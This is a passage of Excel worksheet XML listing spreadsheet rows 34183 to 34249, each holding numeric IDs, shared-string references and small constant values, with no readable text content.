      <c r="A34183" s="1">
        <v>26719.0</v>
      </c>
      <c r="B34183" s="2">
        <v>1.8232683E7</v>
      </c>
      <c r="C34183" s="2" t="s">
        <v>32909</v>
      </c>
      <c r="D34183" s="2">
        <v>1.0</v>
      </c>
      <c r="E34183" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34183" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34184" ht="15.75" customHeight="1">
      <c r="A34184" s="1">
        <v>26758.0</v>
      </c>
      <c r="B34184" s="2">
        <v>1.8433267E7</v>
      </c>
      <c r="C34184" s="2" t="s">
        <v>32910</v>
      </c>
      <c r="D34184" s="2">
        <v>1.0</v>
      </c>
      <c r="E34184" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34184" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34185" ht="15.75" customHeight="1">
      <c r="A34185" s="1">
        <v>26822.0</v>
      </c>
      <c r="B34185" s="2">
        <v>1.8845675E7</v>
      </c>
      <c r="C34185" s="2" t="s">
        <v>32911</v>
      </c>
      <c r="D34185" s="2">
        <v>1.0</v>
      </c>
      <c r="E34185" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34185" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34186" ht="15.75" customHeight="1">
      <c r="A34186" s="1">
        <v>26827.0</v>
      </c>
      <c r="B34186" s="2">
        <v>1.8847999E7</v>
      </c>
      <c r="C34186" s="2" t="s">
        <v>32912</v>
      </c>
      <c r="D34186" s="2">
        <v>1.0</v>
      </c>
      <c r="E34186" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34186" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34187" ht="15.75" customHeight="1">
      <c r="A34187" s="1">
        <v>26910.0</v>
      </c>
      <c r="B34187" s="2">
        <v>1.9327889E7</v>
      </c>
      <c r="C34187" s="2" t="s">
        <v>32913</v>
      </c>
      <c r="D34187" s="2">
        <v>1.0</v>
      </c>
      <c r="E34187" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34187" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34188" ht="15.75" customHeight="1">
      <c r="A34188" s="1">
        <v>26953.0</v>
      </c>
      <c r="B34188" s="2">
        <v>1.961731E7</v>
      </c>
      <c r="C34188" s="2" t="s">
        <v>32829</v>
      </c>
      <c r="D34188" s="2">
        <v>1.0</v>
      </c>
      <c r="E34188" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34188" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34189" ht="15.75" customHeight="1">
      <c r="A34189" s="1">
        <v>27254.0</v>
      </c>
      <c r="B34189" s="2">
        <v>2.108861E7</v>
      </c>
      <c r="C34189" s="2" t="s">
        <v>32914</v>
      </c>
      <c r="D34189" s="2">
        <v>1.0</v>
      </c>
      <c r="E34189" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34189" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34190" ht="15.75" customHeight="1">
      <c r="A34190" s="1">
        <v>27373.0</v>
      </c>
      <c r="B34190" s="2">
        <v>2.1686957E7</v>
      </c>
      <c r="C34190" s="2" t="s">
        <v>32832</v>
      </c>
      <c r="D34190" s="2">
        <v>1.0</v>
      </c>
      <c r="E34190" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34190" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34191" ht="15.75" customHeight="1">
      <c r="A34191" s="1">
        <v>27405.0</v>
      </c>
      <c r="B34191" s="2">
        <v>2.1803528E7</v>
      </c>
      <c r="C34191" s="2" t="s">
        <v>32915</v>
      </c>
      <c r="D34191" s="2">
        <v>1.0</v>
      </c>
      <c r="E34191" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34191" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34192" ht="15.75" customHeight="1">
      <c r="A34192" s="1">
        <v>27481.0</v>
      </c>
      <c r="B34192" s="2">
        <v>2.2019427E7</v>
      </c>
      <c r="C34192" s="2" t="s">
        <v>32916</v>
      </c>
      <c r="D34192" s="2">
        <v>1.0</v>
      </c>
      <c r="E34192" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34192" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34193" ht="15.75" customHeight="1">
      <c r="A34193" s="1">
        <v>27604.0</v>
      </c>
      <c r="B34193" s="2">
        <v>2.2627947E7</v>
      </c>
      <c r="C34193" s="2" t="s">
        <v>32917</v>
      </c>
      <c r="D34193" s="2">
        <v>1.0</v>
      </c>
      <c r="E34193" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34193" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34194" ht="15.75" customHeight="1">
      <c r="A34194" s="1">
        <v>27633.0</v>
      </c>
      <c r="B34194" s="2">
        <v>2.2734912E7</v>
      </c>
      <c r="C34194" s="2" t="s">
        <v>32918</v>
      </c>
      <c r="D34194" s="2">
        <v>1.0</v>
      </c>
      <c r="E34194" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34194" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34195" ht="15.75" customHeight="1">
      <c r="A34195" s="1">
        <v>27634.0</v>
      </c>
      <c r="B34195" s="2">
        <v>2.2736023E7</v>
      </c>
      <c r="C34195" s="2" t="s">
        <v>32919</v>
      </c>
      <c r="D34195" s="2">
        <v>1.0</v>
      </c>
      <c r="E34195" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34195" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34196" ht="15.75" customHeight="1">
      <c r="A34196" s="1">
        <v>27635.0</v>
      </c>
      <c r="B34196" s="2">
        <v>2.2736023E7</v>
      </c>
      <c r="C34196" s="2" t="s">
        <v>32920</v>
      </c>
      <c r="D34196" s="2">
        <v>1.0</v>
      </c>
      <c r="E34196" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34196" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34197" ht="15.75" customHeight="1">
      <c r="A34197" s="1">
        <v>27825.0</v>
      </c>
      <c r="B34197" s="2">
        <v>2.3389041E7</v>
      </c>
      <c r="C34197" s="2" t="s">
        <v>32921</v>
      </c>
      <c r="D34197" s="2">
        <v>1.0</v>
      </c>
      <c r="E34197" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34197" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34198" ht="15.75" customHeight="1">
      <c r="A34198" s="1">
        <v>27898.0</v>
      </c>
      <c r="B34198" s="2">
        <v>2.3666187E7</v>
      </c>
      <c r="C34198" s="5" t="s">
        <v>32922</v>
      </c>
      <c r="D34198" s="2">
        <v>1.0</v>
      </c>
      <c r="E34198" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34198" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34199" ht="15.75" customHeight="1">
      <c r="A34199" s="1">
        <v>28042.0</v>
      </c>
      <c r="B34199" s="2">
        <v>2.4519875E7</v>
      </c>
      <c r="C34199" s="2" t="s">
        <v>32835</v>
      </c>
      <c r="D34199" s="2">
        <v>1.0</v>
      </c>
      <c r="E34199" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34199" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34200" ht="15.75" customHeight="1">
      <c r="A34200" s="1">
        <v>28070.0</v>
      </c>
      <c r="B34200" s="2">
        <v>2.4628951E7</v>
      </c>
      <c r="C34200" s="2" t="s">
        <v>32923</v>
      </c>
      <c r="D34200" s="2">
        <v>1.0</v>
      </c>
      <c r="E34200" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34200" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34201" ht="15.75" customHeight="1">
      <c r="A34201" s="1">
        <v>28299.0</v>
      </c>
      <c r="B34201" s="2">
        <v>2.5604602E7</v>
      </c>
      <c r="C34201" s="2" t="s">
        <v>32836</v>
      </c>
      <c r="D34201" s="2">
        <v>1.0</v>
      </c>
      <c r="E34201" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34201" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34202" ht="15.75" customHeight="1">
      <c r="A34202" s="1">
        <v>28328.0</v>
      </c>
      <c r="B34202" s="2">
        <v>2.5879564E7</v>
      </c>
      <c r="C34202" s="2" t="s">
        <v>32924</v>
      </c>
      <c r="D34202" s="2">
        <v>1.0</v>
      </c>
      <c r="E34202" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34202" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34203" ht="15.75" customHeight="1">
      <c r="A34203" s="1">
        <v>28408.0</v>
      </c>
      <c r="B34203" s="2">
        <v>2.628424E7</v>
      </c>
      <c r="C34203" s="5" t="s">
        <v>32925</v>
      </c>
      <c r="D34203" s="2">
        <v>1.0</v>
      </c>
      <c r="E34203" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34203" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34204" ht="15.75" customHeight="1">
      <c r="A34204" s="1">
        <v>28438.0</v>
      </c>
      <c r="B34204" s="2">
        <v>2.6502167E7</v>
      </c>
      <c r="C34204" s="2" t="s">
        <v>32926</v>
      </c>
      <c r="D34204" s="2">
        <v>1.0</v>
      </c>
      <c r="E34204" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34204" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34205" ht="15.75" customHeight="1">
      <c r="A34205" s="1">
        <v>28556.0</v>
      </c>
      <c r="B34205" s="2">
        <v>2.6874665E7</v>
      </c>
      <c r="C34205" s="2" t="s">
        <v>32927</v>
      </c>
      <c r="D34205" s="2">
        <v>1.0</v>
      </c>
      <c r="E34205" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34205" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34206" ht="15.75" customHeight="1">
      <c r="A34206" s="1">
        <v>28641.0</v>
      </c>
      <c r="B34206" s="2">
        <v>2.7304328E7</v>
      </c>
      <c r="C34206" s="2" t="s">
        <v>32928</v>
      </c>
      <c r="D34206" s="2">
        <v>1.0</v>
      </c>
      <c r="E34206" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34206" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34207" ht="15.75" customHeight="1">
      <c r="A34207" s="1">
        <v>28703.0</v>
      </c>
      <c r="B34207" s="2">
        <v>2.7752875E7</v>
      </c>
      <c r="C34207" s="2" t="s">
        <v>32844</v>
      </c>
      <c r="D34207" s="2">
        <v>1.0</v>
      </c>
      <c r="E34207" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34207" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34208" ht="15.75" customHeight="1">
      <c r="A34208" s="1">
        <v>28832.0</v>
      </c>
      <c r="B34208" s="2">
        <v>2.8874864E7</v>
      </c>
      <c r="C34208" s="2" t="s">
        <v>32929</v>
      </c>
      <c r="D34208" s="2">
        <v>1.0</v>
      </c>
      <c r="E34208" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34208" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34209" ht="15.75" customHeight="1">
      <c r="A34209" s="1">
        <v>28843.0</v>
      </c>
      <c r="B34209" s="2">
        <v>2.8947478E7</v>
      </c>
      <c r="C34209" s="2" t="s">
        <v>32930</v>
      </c>
      <c r="D34209" s="2">
        <v>1.0</v>
      </c>
      <c r="E34209" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34209" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34210" ht="15.75" customHeight="1">
      <c r="A34210" s="1">
        <v>28957.0</v>
      </c>
      <c r="B34210" s="2">
        <v>2.9742171E7</v>
      </c>
      <c r="C34210" s="2" t="s">
        <v>32931</v>
      </c>
      <c r="D34210" s="2">
        <v>1.0</v>
      </c>
      <c r="E34210" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34210" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34211" ht="15.75" customHeight="1">
      <c r="A34211" s="1">
        <v>29101.0</v>
      </c>
      <c r="B34211" s="2">
        <v>3.0416075E7</v>
      </c>
      <c r="C34211" s="2" t="s">
        <v>32847</v>
      </c>
      <c r="D34211" s="2">
        <v>1.0</v>
      </c>
      <c r="E34211" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34211" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34212" ht="15.75" customHeight="1">
      <c r="A34212" s="1">
        <v>29127.0</v>
      </c>
      <c r="B34212" s="2">
        <v>3.0513628E7</v>
      </c>
      <c r="C34212" s="2" t="s">
        <v>32932</v>
      </c>
      <c r="D34212" s="2">
        <v>1.0</v>
      </c>
      <c r="E34212" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34212" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34213" ht="15.75" customHeight="1">
      <c r="A34213" s="1">
        <v>29149.0</v>
      </c>
      <c r="B34213" s="2">
        <v>3.0589322E7</v>
      </c>
      <c r="C34213" s="2" t="s">
        <v>32933</v>
      </c>
      <c r="D34213" s="2">
        <v>1.0</v>
      </c>
      <c r="E34213" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34213" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34214" ht="15.75" customHeight="1">
      <c r="A34214" s="1">
        <v>29173.0</v>
      </c>
      <c r="B34214" s="2">
        <v>3.0708875E7</v>
      </c>
      <c r="C34214" s="2" t="s">
        <v>32934</v>
      </c>
      <c r="D34214" s="2">
        <v>1.0</v>
      </c>
      <c r="E34214" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34214" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34215" ht="15.75" customHeight="1">
      <c r="A34215" s="1">
        <v>29245.0</v>
      </c>
      <c r="B34215" s="2">
        <v>3.0858355E7</v>
      </c>
      <c r="C34215" s="5" t="s">
        <v>32935</v>
      </c>
      <c r="D34215" s="2">
        <v>1.0</v>
      </c>
      <c r="E34215" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34215" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34216" ht="15.75" customHeight="1">
      <c r="A34216" s="1">
        <v>29348.0</v>
      </c>
      <c r="B34216" s="2">
        <v>3.1506317E7</v>
      </c>
      <c r="C34216" s="2" t="s">
        <v>32850</v>
      </c>
      <c r="D34216" s="2">
        <v>1.0</v>
      </c>
      <c r="E34216" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34216" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34217" ht="15.75" customHeight="1">
      <c r="A34217" s="1">
        <v>29528.0</v>
      </c>
      <c r="B34217" s="2">
        <v>3.2806363E7</v>
      </c>
      <c r="C34217" s="5" t="s">
        <v>32936</v>
      </c>
      <c r="D34217" s="2">
        <v>1.0</v>
      </c>
      <c r="E34217" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34217" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34218" ht="15.75" customHeight="1">
      <c r="A34218" s="1">
        <v>29575.0</v>
      </c>
      <c r="B34218" s="2">
        <v>3.3384141E7</v>
      </c>
      <c r="C34218" s="2" t="s">
        <v>32937</v>
      </c>
      <c r="D34218" s="2">
        <v>1.0</v>
      </c>
      <c r="E34218" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34218" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34219" ht="15.75" customHeight="1">
      <c r="A34219" s="1">
        <v>29642.0</v>
      </c>
      <c r="B34219" s="2">
        <v>3.3800262E7</v>
      </c>
      <c r="C34219" s="2" t="s">
        <v>32938</v>
      </c>
      <c r="D34219" s="2">
        <v>1.0</v>
      </c>
      <c r="E34219" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34219" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34220" ht="15.75" customHeight="1">
      <c r="A34220" s="1">
        <v>29760.0</v>
      </c>
      <c r="B34220" s="2">
        <v>3.4815502E7</v>
      </c>
      <c r="C34220" s="2" t="s">
        <v>32939</v>
      </c>
      <c r="D34220" s="2">
        <v>1.0</v>
      </c>
      <c r="E34220" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34220" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34221" ht="15.75" customHeight="1">
      <c r="A34221" s="1">
        <v>29834.0</v>
      </c>
      <c r="B34221" s="2">
        <v>3.547552E7</v>
      </c>
      <c r="C34221" s="2" t="s">
        <v>32940</v>
      </c>
      <c r="D34221" s="2">
        <v>1.0</v>
      </c>
      <c r="E34221" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34221" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34222" ht="15.75" customHeight="1">
      <c r="A34222" s="1">
        <v>29871.0</v>
      </c>
      <c r="B34222" s="2">
        <v>3.5997781E7</v>
      </c>
      <c r="C34222" s="2" t="s">
        <v>32854</v>
      </c>
      <c r="D34222" s="2">
        <v>1.0</v>
      </c>
      <c r="E34222" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34222" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34223" ht="15.75" customHeight="1">
      <c r="A34223" s="1">
        <v>29879.0</v>
      </c>
      <c r="B34223" s="2">
        <v>3.6037735E7</v>
      </c>
      <c r="C34223" s="2" t="s">
        <v>32941</v>
      </c>
      <c r="D34223" s="2">
        <v>1.0</v>
      </c>
      <c r="E34223" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34223" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34224" ht="15.75" customHeight="1">
      <c r="A34224" s="1">
        <v>29909.0</v>
      </c>
      <c r="B34224" s="2">
        <v>3607050.0</v>
      </c>
      <c r="C34224" s="2" t="s">
        <v>32942</v>
      </c>
      <c r="D34224" s="2">
        <v>1.0</v>
      </c>
      <c r="E34224" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34224" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34225" ht="15.75" customHeight="1">
      <c r="A34225" s="1">
        <v>29925.0</v>
      </c>
      <c r="B34225" s="2">
        <v>3607052.0</v>
      </c>
      <c r="C34225" s="2" t="s">
        <v>32943</v>
      </c>
      <c r="D34225" s="2">
        <v>1.0</v>
      </c>
      <c r="E34225" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34225" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34226" ht="15.75" customHeight="1">
      <c r="A34226" s="1">
        <v>29984.0</v>
      </c>
      <c r="B34226" s="2">
        <v>3.6107381E7</v>
      </c>
      <c r="C34226" s="2" t="s">
        <v>32855</v>
      </c>
      <c r="D34226" s="2">
        <v>1.0</v>
      </c>
      <c r="E34226" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34226" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34227" ht="15.75" customHeight="1">
      <c r="A34227" s="1">
        <v>30043.0</v>
      </c>
      <c r="B34227" s="2">
        <v>3.6211715E7</v>
      </c>
      <c r="C34227" s="2" t="s">
        <v>32944</v>
      </c>
      <c r="D34227" s="2">
        <v>1.0</v>
      </c>
      <c r="E34227" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34227" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34228" ht="15.75" customHeight="1">
      <c r="A34228" s="1">
        <v>30053.0</v>
      </c>
      <c r="B34228" s="2">
        <v>3625090.0</v>
      </c>
      <c r="C34228" s="2" t="s">
        <v>32945</v>
      </c>
      <c r="D34228" s="2">
        <v>1.0</v>
      </c>
      <c r="E34228" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34228" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34229" ht="15.75" customHeight="1">
      <c r="A34229" s="1">
        <v>30054.0</v>
      </c>
      <c r="B34229" s="2">
        <v>3625090.0</v>
      </c>
      <c r="C34229" s="2" t="s">
        <v>32946</v>
      </c>
      <c r="D34229" s="2">
        <v>1.0</v>
      </c>
      <c r="E34229" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34229" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34230" ht="15.75" customHeight="1">
      <c r="A34230" s="1">
        <v>30111.0</v>
      </c>
      <c r="B34230" s="2">
        <v>3.6754477E7</v>
      </c>
      <c r="C34230" s="2" t="s">
        <v>32947</v>
      </c>
      <c r="D34230" s="2">
        <v>1.0</v>
      </c>
      <c r="E34230" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34230" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34231" ht="15.75" customHeight="1">
      <c r="A34231" s="1">
        <v>30155.0</v>
      </c>
      <c r="B34231" s="2">
        <v>3.7042415E7</v>
      </c>
      <c r="C34231" s="2" t="s">
        <v>32948</v>
      </c>
      <c r="D34231" s="2">
        <v>1.0</v>
      </c>
      <c r="E34231" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34231" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34232" ht="15.75" customHeight="1">
      <c r="A34232" s="1">
        <v>30180.0</v>
      </c>
      <c r="B34232" s="2">
        <v>3716326.0</v>
      </c>
      <c r="C34232" s="2" t="s">
        <v>32949</v>
      </c>
      <c r="D34232" s="2">
        <v>1.0</v>
      </c>
      <c r="E34232" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34232" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34233" ht="15.75" customHeight="1">
      <c r="A34233" s="1">
        <v>30482.0</v>
      </c>
      <c r="B34233" s="2">
        <v>3.9821058E7</v>
      </c>
      <c r="C34233" s="2" t="s">
        <v>32950</v>
      </c>
      <c r="D34233" s="2">
        <v>1.0</v>
      </c>
      <c r="E34233" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34233" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34234" ht="15.75" customHeight="1">
      <c r="A34234" s="1">
        <v>30524.0</v>
      </c>
      <c r="B34234" s="2">
        <v>4.0287971E7</v>
      </c>
      <c r="C34234" s="2" t="s">
        <v>32951</v>
      </c>
      <c r="D34234" s="2">
        <v>1.0</v>
      </c>
      <c r="E34234" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34234" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34235" ht="15.75" customHeight="1">
      <c r="A34235" s="1">
        <v>30772.0</v>
      </c>
      <c r="B34235" s="2">
        <v>4.4596683E7</v>
      </c>
      <c r="C34235" s="2" t="s">
        <v>32952</v>
      </c>
      <c r="D34235" s="2">
        <v>1.0</v>
      </c>
      <c r="E34235" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34235" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34236" ht="15.75" customHeight="1">
      <c r="A34236" s="1">
        <v>30816.0</v>
      </c>
      <c r="B34236" s="2">
        <v>4531075.0</v>
      </c>
      <c r="C34236" s="2" t="s">
        <v>32953</v>
      </c>
      <c r="D34236" s="2">
        <v>1.0</v>
      </c>
      <c r="E34236" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34236" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34237" ht="15.75" customHeight="1">
      <c r="A34237" s="1">
        <v>30909.0</v>
      </c>
      <c r="B34237" s="2">
        <v>4.677977E7</v>
      </c>
      <c r="C34237" s="2" t="s">
        <v>32954</v>
      </c>
      <c r="D34237" s="2">
        <v>1.0</v>
      </c>
      <c r="E34237" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34237" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34238" ht="15.75" customHeight="1">
      <c r="A34238" s="1">
        <v>30993.0</v>
      </c>
      <c r="B34238" s="2">
        <v>4.7580758E7</v>
      </c>
      <c r="C34238" s="2" t="s">
        <v>32955</v>
      </c>
      <c r="D34238" s="2">
        <v>1.0</v>
      </c>
      <c r="E34238" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34238" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34239" ht="15.75" customHeight="1">
      <c r="A34239" s="1">
        <v>31036.0</v>
      </c>
      <c r="B34239" s="2">
        <v>4.7817785E7</v>
      </c>
      <c r="C34239" s="2" t="s">
        <v>32956</v>
      </c>
      <c r="D34239" s="2">
        <v>1.0</v>
      </c>
      <c r="E34239" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34239" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34240" ht="15.75" customHeight="1">
      <c r="A34240" s="1">
        <v>31093.0</v>
      </c>
      <c r="B34240" s="2">
        <v>4.8477137E7</v>
      </c>
      <c r="C34240" s="2" t="s">
        <v>32957</v>
      </c>
      <c r="D34240" s="2">
        <v>1.0</v>
      </c>
      <c r="E34240" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34240" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34241" ht="15.75" customHeight="1">
      <c r="A34241" s="1">
        <v>31123.0</v>
      </c>
      <c r="B34241" s="2">
        <v>4.885145E7</v>
      </c>
      <c r="C34241" s="5" t="s">
        <v>32958</v>
      </c>
      <c r="D34241" s="2">
        <v>1.0</v>
      </c>
      <c r="E34241" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34241" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34242" ht="15.75" customHeight="1">
      <c r="A34242" s="1">
        <v>31146.0</v>
      </c>
      <c r="B34242" s="2">
        <v>4889824.0</v>
      </c>
      <c r="C34242" s="2" t="s">
        <v>32959</v>
      </c>
      <c r="D34242" s="2">
        <v>1.0</v>
      </c>
      <c r="E34242" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34242" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34243" ht="15.75" customHeight="1">
      <c r="A34243" s="1">
        <v>31201.0</v>
      </c>
      <c r="B34243" s="2">
        <v>4921456.0</v>
      </c>
      <c r="C34243" s="2" t="s">
        <v>32960</v>
      </c>
      <c r="D34243" s="2">
        <v>1.0</v>
      </c>
      <c r="E34243" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34243" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34244" ht="15.75" customHeight="1">
      <c r="A34244" s="1">
        <v>31412.0</v>
      </c>
      <c r="B34244" s="2">
        <v>5006734.0</v>
      </c>
      <c r="C34244" s="2" t="s">
        <v>32961</v>
      </c>
      <c r="D34244" s="2">
        <v>1.0</v>
      </c>
      <c r="E34244" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34244" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34245" ht="15.75" customHeight="1">
      <c r="A34245" s="1">
        <v>31472.0</v>
      </c>
      <c r="B34245" s="2">
        <v>5.047701E7</v>
      </c>
      <c r="C34245" s="2" t="s">
        <v>32866</v>
      </c>
      <c r="D34245" s="2">
        <v>1.0</v>
      </c>
      <c r="E34245" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34245" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34246" ht="15.75" customHeight="1">
      <c r="A34246" s="1">
        <v>31627.0</v>
      </c>
      <c r="B34246" s="2">
        <v>5144065.0</v>
      </c>
      <c r="C34246" s="2" t="s">
        <v>32962</v>
      </c>
      <c r="D34246" s="2">
        <v>1.0</v>
      </c>
      <c r="E34246" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34246" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34247" ht="15.75" customHeight="1">
      <c r="A34247" s="1">
        <v>31727.0</v>
      </c>
      <c r="B34247" s="2">
        <v>5.2136693E7</v>
      </c>
      <c r="C34247" s="2" t="s">
        <v>32963</v>
      </c>
      <c r="D34247" s="2">
        <v>1.0</v>
      </c>
      <c r="E34247" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34247" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34248" ht="15.75" customHeight="1">
      <c r="A34248" s="1">
        <v>31777.0</v>
      </c>
      <c r="B34248" s="2">
        <v>5221577.0</v>
      </c>
      <c r="C34248" s="2" t="s">
        <v>32868</v>
      </c>
      <c r="D34248" s="2">
        <v>1.0</v>
      </c>
      <c r="E34248" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34248" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34249" ht="15.75" customHeight="1">
      <c r="A34249" s="1">
        <v>31832.0</v>
      </c>
      <c r="B34249" s="2">
        <v>5253711.0</v>
      </c>
      <c r="C34249" s="2" t="s">
        <v>32964</v>
      </c>
      <c r="D34249" s="2">
        <v>1.0</v>
      </c>
      <c r="E34249" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34249" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34250" ht="15.75" customHeight="1">
      <c r="A34250" s="1">
